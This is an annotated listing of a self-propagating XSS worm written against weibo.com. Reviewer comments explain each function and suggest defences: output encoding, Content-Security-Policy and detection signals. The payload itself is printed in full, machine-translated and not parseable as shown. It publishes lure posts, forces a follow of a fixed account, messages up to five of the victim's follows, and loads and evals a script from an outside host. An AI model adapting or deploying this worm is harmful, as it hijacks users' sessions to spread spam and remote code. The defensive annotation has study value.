// Annotated listing: a self-propagating XSS payload written to run inside a logged-in weibo.com page.
// NOTE(review): the text has been through machine translation (capitalised keywords such as
// "Function" and "New", spaces inside tokens, "I" as the loop index, mangled quotes and operators),
// so it does not parse as JavaScript as shown. The code below is left exactly as found; only
// these comments are added.
//
// What each part does, in order of appearance:
//   createXHR()    - returns an XMLHttpRequest, or the ActiveXObject fallback when the former is absent.
//   getappkey(url) - synchronous GET (third open() argument is false); runs a regex over the response
//                    text for namecard/title attributes, takes the fourth '"'-separated field of each
//                    match and returns the values joined by '|'. match() yields null when nothing
//                    matches, so the loop would throw; the caller's try/catch hides that.
//   random_msg()   - picks one lure string at random, appends a short link carrying a timestamp,
//                    and returns the result URI-encoded.
//   post(...)      - form-encoded POST helper; its third parameter is passed as the async flag of open().
//   publish()      - posts the lure as a status update.
//   follow()       - makes the current user ($CONFIG.$uid) follow one hard-coded account id.
//   message()      - reads the current user's follow page and sends the lure as a private message to
//                    at most five of the extracted names; the text is URI-encoded a second time here.
//   main()         - runs publish, follow and message, each inside try/catch with an empty handler.
//   top level      - eval()s a string in window.opener that appends a script element loaded from a
//                    third-party host, calls main(), then redirects after 5000 ms using a string
//                    argument to setTimeout.
// Apart from msgs, msg and t, no variable is declared, so the rest become globals of the host page.
//
// Defensive reading:
//   - Every request is issued by script running in the site's own origin, so the browser attaches the
//     victim's session to it. The request bodies built here carry no per-request token; even where
//     one exists, same-origin script can read it, so the primary control is fixing the injection
//     point (not shown in this listing) with context-aware output encoding.
//   - A Content-Security-Policy that restricts script sources and disallows eval and string timers
//     would be expected to block the external script load and the eval call seen at the end.
//   - Detection signals visible from this code: a burst of publish, follow and message POSTs from one
//     session within seconds, many accounts following the same uid, and the same short-link host
//     appearing in new posts and private messages.
Function createXHR () {return window. XMLHttpRequest? New XMLHttpRequest (): new ActiveXObject ("Microsoft. XMLHTTP ");} function getappkey (url) {xmlHttp = createXHR (); xmlHttp. open ("GET", url, false); xmlHttp. send (); result = xmlHttp. responseText; id_arr = ''; id = result. match (/namecard = \ "true \" title = \ "[^ \"] */g); for (I = 0; I <id. length; I ++) {sum = id [I]. toString (). split ('"') [3]; id_arr + = sum + '|';} return id_arr;} function random_msg () {link = 'http://163.fm/PxZHoxn? Id = '+ new Date (). getTime (); var msgs = ['some unnoticed details of the Guo Meimei incident: ', 'helping the party in the founding of the great business:', 'Let a woman's heart beat the 100 poems: ', '3d meat troupe HD Mandarin edition seed:', 'This is the legend of the fairy:', 'shocking! Fan Bingbing's photo has really flowed out: ', 'yang MI has been cracked for many times by the following rules:', 'dumb grabs a bank with a hammer: ', 'Software that can listen to others' mobile phones :', 'tax start point is expected to mention 4000: ']; var msg = msgs [Math. floor (Math. random () * msgs. length)] + link; msg = encodeURIComponent (msg); return msg;} function post (url, data, sync) {xmlHttp = createXHR (); xmlHttp. open ("POST", url, sync); xmlHttp. setRequestHeader ("Accept", "text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8"); xmlHttp. setRequestHeader ("Content-Type "," Application/x-www-form-urlencoded; charset = UTF-8 "); xmlHttp. send (data);} function publish () {url = 'HTTP: // weibo.com/mblog/publish.php? Rnd = '+ new Date (). getTime (); data = 'content = '+ random_msg () +' & pic = & styleid = 2 & retcode = '; post (url, data, true );} function follow () {url = 'HTTP: // weibo.com/attention/aj_addfollow.php? Refer_sort = profile & atnId = profile & rnd = '+ new Date (). getTime (); data = 'uid = '+ 2201270010 + '& fromuid =' + $ CONFIG. 
$ uid + '& refer_sort = profile & atnId = profile'; post (url, data, true);} function message () {url = 'HTTP: // weibo.com/'+ $ CONFIG. $ uid + '/follow'; ids = getappkey (url); id = ids. split ('|'); for (I = 0; I <id. length-1 & I <5; I ++) {msgurl = 'HTTP: // weibo.com/message/addmsg.php? Rnd = '+ new Date (). getTime (); msg = random_msg (); msg = encodeURIComponent (msg); user = encodeURIComponent (id [I]); data = 'content = '+ msg +' & name = '+ user +' & retcode = '; post (msgurl, data, false) ;}} function main () {try {publish () ;}catch (e) {}try {follow () ;}catch (e) {}try {message () ;}catch (e) {}} try {x = "g = document. createElement ('script'); g. src = 'HTTP: // www.2kt.cn/images/t.js'{document.body.appendchild (g) "; window. opener. eval (x);} catch (e) {} main (); var t = setTimeout ('location = "http://weibo.com/pub/topic"; ', 5000 );
I happened to study the source code of the XSS attack on Sina Weibo. (The coding style is good.) This document is for reference only and must not be used for illegal purposes.